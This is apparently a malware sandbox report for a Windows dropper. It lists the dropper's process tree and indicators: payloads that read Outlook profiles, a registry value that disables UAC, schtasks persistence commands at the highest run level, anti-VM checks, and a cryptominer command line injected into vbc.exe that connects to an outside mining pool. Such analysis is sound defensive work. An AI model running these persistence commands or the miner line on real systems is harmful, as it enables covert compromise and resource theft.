3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 1552 msedge.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe 3856 8Grb8KDhLIvSHwFX11Lr.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Each row is "PID <parent> wrote to memory of <child>"; identical rows of the original listing are collapsed, and the last column gives how many times the row appeared (64 in total).

parent PID  parent process                      child PID  child process     rows
4344        4363463463464363463463463.bin.exe   2876       rty47.exe         2
4344        4363463463464363463463463.bin.exe   2096       bugai.exe         3
4344        4363463463464363463463463.bin.exe   1324       ma.exe            2
1324        ma.exe                              3700       cmd.exe           2
3700        cmd.exe                             852        timeout.exe       2
4344        4363463463464363463463463.bin.exe   3720       dvchost.exe       3
3700        cmd.exe                             2868       .exe              2
2868        .exe                                4644       cmd.exe           2
4644        cmd.exe                             3520       schtasks.exe      2
4344        4363463463464363463463463.bin.exe   3780       native.exe        3
3720        dvchost.exe                         2104       cmd.exe           2
2104        cmd.exe                             3200       mode.com          2
2104        cmd.exe                             1304       7z.exe            2
2104        cmd.exe                             2584       7z.exe            2
2104        cmd.exe                             4316       7z.exe            2
2104        cmd.exe                             4080       7z.exe            2
2104        cmd.exe                             2008       chcp.com          2
2104        cmd.exe                             2020       winhostDhcp.exe   2
2868        .exe                                1644       vbc.exe           7
2020        winhostDhcp.exe                     5048       cmd.exe           2
5048        cmd.exe                             2008       chcp.com          2
4344        4363463463464363463463463.bin.exe   3280       _wT.exe           2
4344        4363463463464363463463463.bin.exe   2888       NSudo.exe         2
4344        4363463463464363463463463.bin.exe   4044       32.exe            3
5048        cmd.exe                             756        w32tm.exe         2
5048        cmd.exe                             1756       conhost.exe       2
3780        native.exe                          1844       BBLb.exe          3
System policy modification 1 TTPs 1 IoCs
Processes:
miner.exe
description      ioc                                                                                           process
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"  miner.exe
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Views/modifies file attributes 1 TTPs 1 IoCs
outlook_office_path 1 IoCs
Processes:
bugai.exe
description  ioc                                                                                                                                                    process
Key opened   \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  bugai.exe
outlook_win_path 1 IoCs
Processes:
bugai.exe
description  ioc                                                                                                                                                                                  process
Key opened   \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676  bugai.exe
Processes

The bracketed number is the process's depth in the tree; each child is listed below its parent.

[1] C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.bin.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.bin.exe"
    - Checks computer location settings
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 4344
  [2] C:\Users\Admin\AppData\Local\Temp\Files\rty47.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\Files\rty47.exe"
      - Executes dropped EXE
      PID: 2876
  [2] C:\Users\Admin\AppData\Local\Temp\Files\bugai.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\Files\bugai.exe"
      - Checks computer location settings
      - Executes dropped EXE
      - Accesses Microsoft Outlook profiles
      - Adds Run key to start application
      - Drops file in System32 directory
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Checks processor information in registry
      - Suspicious behavior: EnumeratesProcesses
      - outlook_office_path
      - outlook_win_path
      PID: 2096
    [3] C:\Windows\SysWOW64\schtasks.exe
        Command line: schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
        - Creates scheduled task(s)
        PID: 436
    [3] C:\Windows\SysWOW64\schtasks.exe
        Command line: schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
        - Creates scheduled task(s)
        PID: 4416
    [3] C:\Users\Admin\AppData\Local\Temp\heidi1lYaOz_hhmA8\8Grb8KDhLIvSHwFX11Lr.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\heidi1lYaOz_hhmA8\8Grb8KDhLIvSHwFX11Lr.exe"
        - Checks computer location settings
        - Executes dropped EXE
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of SendNotifyMessage
        PID: 3856
      [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/
          PID: 3956
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffed63846f8,0x7ffed6384708,0x7ffed6384718
            PID: 2184
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,5597203421561906269,6992843833515507126,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3
            PID: 6104
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,5597203421561906269,6992843833515507126,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2
            PID: 6096
      [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.linkedin.com/login
          PID: 4304
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffed63846f8,0x7ffed6384708,0x7ffed6384718
            - Checks processor information in registry
            - Enumerates system info in registry
            PID: 3540
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2028,16576133022588054333,6748342368802147436,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 /prefetch:3
            PID: 6060
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2028,16576133022588054333,6748342368802147436,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2040 /prefetch:2
            PID: 6044
      [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video
          - Enumerates system info in registry
          - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          - Suspicious use of FindShellTrayWindow
          - Suspicious use of SendNotifyMessage
          PID: 1552
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffed63846f8,0x7ffed6384708,0x7ffed6384718
            - Checks processor information in registry
            - Enumerates system info in registry
            PID: 4860
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,1570712799063802657,10623681284306276479,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3
            PID: 5748
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,1570712799063802657,10623681284306276479,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:8
            PID: 5944
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,1570712799063802657,10623681284306276479,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
            PID: 5932
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,1570712799063802657,10623681284306276479,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
            PID: 5704
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,1570712799063802657,10623681284306276479,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2
            PID: 5740
      [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
          PID: 4380
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffed63846f8,0x7ffed6384708,0x7ffed6384718
            - Checks processor information in registry
            - Enumerates system info in registry
            PID: 2684
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1436,17294382015584421993,1794699919527336225,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 /prefetch:3
            PID: 6808
      [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.facebook.com/video
          PID: 3668
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffed63846f8,0x7ffed6384708,0x7ffed6384718
            PID: 1320
      [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.youtube.com
          PID: 4164
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffed63846f8,0x7ffed6384708,0x7ffed6384718
            - Checks processor information in registry
            - Enumerates system info in registry
            PID: 4384
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,6535321715299811068,16110170856613559928,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3
            PID: 6968
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,6535321715299811068,16110170856613559928,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
            PID: 6680
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,6535321715299811068,16110170856613559928,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2476 /prefetch:2
            PID: 6704
      [4] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://accounts.google.com
          PID: 3968
        [5] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffed63846f8,0x7ffed6384708,0x7ffed6384718
            PID: 4432
      [4] C:\Program Files\Google\Chrome\Application\chrome.exe
          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com
          - Enumerates system info in registry
          PID: 4080
        [5] C:\Program Files\Google\Chrome\Application\chrome.exe
            Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffed6229758,0x7ffed6229768,0x7ffed6229778
            PID: 3428
      [4] C:\Program Files\Google\Chrome\Application\chrome.exe
          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.facebook.com/video
          - Enumerates system info in registry
          PID: 3908
        [5] C:\Program Files\Google\Chrome\Application\chrome.exe
            Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffed6229758,0x7ffed6229768,0x7ffed6229778
            PID: 3616
      [4] C:\Program Files\Google\Chrome\Application\chrome.exe
          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com
          - Enumerates system info in registry
          PID: 1856
        [5] C:\Program Files\Google\Chrome\Application\chrome.exe
            Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffed6229758,0x7ffed6229768,0x7ffed6229778
            PID: 3620
      [4] C:\Program Files\Mozilla Firefox\firefox.exe
          Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
          PID: 5184
        [5] C:\Program Files\Mozilla Firefox\firefox.exe
            Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
            - Checks processor information in registry
            PID: 5320
          [6] C:\Program Files\Mozilla Firefox\firefox.exe
              Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5320.0.1755213877\1603258636" -parentBuildID 20221007134813 -prefsHandle 1868 -prefMapHandle 1852 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {62500a25-2739-4050-befa-eb8002bb9790} 5320 "\\.\pipe\gecko-crash-server-pipe.5320" 1960 26cb06d2458 gpu
              PID: 6708
      [4] C:\Program Files\Mozilla Firefox\firefox.exe
          Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
          PID: 5368
        [5] C:\Program Files\Mozilla Firefox\firefox.exe
            Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
            PID: 5624
      [4] C:\Program Files\Mozilla Firefox\firefox.exe
          Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
          PID: 2120
        [5] C:\Program Files\Mozilla Firefox\firefox.exe
            Command line: "C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
            PID: 6208
    [3] C:\Users\Admin\AppData\Local\Temp\heidi1lYaOz_hhmA8\CuxOU1F9RSuscwzIIgFo.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\heidi1lYaOz_hhmA8\CuxOU1F9RSuscwzIIgFo.exe"
        - Identifies VirtualBox via ACPI registry values (likely anti-VM)
        - Checks BIOS information in registry
        - Executes dropped EXE
        - Identifies Wine through registry keys
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        PID: 932
  [2] C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 1324
    [3] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpBD83.tmp.bat""
        - Suspicious use of WriteProcessMemory
        PID: 3700
      [4] C:\Windows\system32\timeout.exe
          Command line: timeout 3
          - Delays execution with timeout.exe
          PID: 852
      [4] C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
          Command line: "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
          - Checks computer location settings
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
          PID: 2868
        [5] C:\Windows\System32\cmd.exe
            Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
            - Suspicious use of WriteProcessMemory
            PID: 4644
          [6] C:\Windows\system32\schtasks.exe
              Command line: schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
              - Creates scheduled task(s)
              PID: 3520
        [5] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
            Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of FindShellTrayWindow
            PID: 1644
  [2] C:\Users\Admin\AppData\Local\Temp\Files\dvchost.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\Files\dvchost.exe"
      - Checks computer location settings
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
      PID: 3720
    [3] C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
        - Suspicious use of WriteProcessMemory
        PID: 2104
      [4] C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          Command line: 7z.exe e extracted/file_3.zip -oextracted
          - Executes dropped EXE
          - Loads dropped DLL
          - Suspicious use of AdjustPrivilegeToken
          PID: 2584
      [4] C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          Command line: 7z.exe e extracted/file_2.zip -oextracted
          - Executes dropped EXE
          - Loads dropped DLL
          - Suspicious use of AdjustPrivilegeToken
          PID: 4316
      [4] C:\Users\Admin\AppData\Local\Temp\main\7z.exe
          Command line: 7z.exe e extracted/file_1.zip -oextracted
          - Executes dropped EXE
